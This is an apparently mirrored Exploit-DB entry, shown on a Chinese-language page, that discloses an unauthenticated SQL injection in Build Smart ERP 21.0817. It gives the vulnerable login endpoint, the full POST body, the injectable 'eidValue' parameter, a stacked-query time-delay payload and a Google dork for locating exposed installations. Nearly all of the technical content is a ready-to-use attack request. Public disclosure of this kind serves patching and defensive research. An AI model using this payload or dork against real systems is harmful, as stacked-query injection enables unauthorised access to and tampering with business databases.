Build Smart ERP 21.0817 – ‘eidValue’ SQL Injection (Unauthenticated)

• Exploit Database
• 42 阅读

• 作者： Nehru Sethuraman
  日期： 2021-10-25
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/50445/

• # Exploit Title: Build Smart ERP 21.0817 - 'eidValue' SQL Injection (Unauthenticated)
  # Date: 24/10/2021
  # Exploit Author: Nehru Sethuraman
  # Vendor Homepage: https://ribccs.com/solutions/solution-buildsmart
  # Version: 21.0817
  # Build: 3
  # Google Dorks: intitle:buildsmart accounting
  # Tested on: OS - Windows 2012 R2 or 8.1& Database - Microsoft SQL Server 2014
  
  Exploit Details:
  
  URL: https://example.com/acc/validateLogin.asp?SkipDBSetup=NO&redirectUrl=
  
  *HTTP Method:* POST
  
  *POST DATA:*
  
  VersionNumber=21.0906&activexVersion=3%2C9%2C0%2C0&XLImportCab=1%2C21%2C0%2C0&updaterActivexVersion=4%2C19%2C0%2C0&lang=eng&rptlang=eng&loginID=admin&userPwd=admin&EID=company&eidValue=company&userEmail=
  
  Vulnerable Parameter: eidValue
  
  SQL Injection Type: Stacked queries
  
  Payload: ';WAITFOR DELAY '0:0:3'--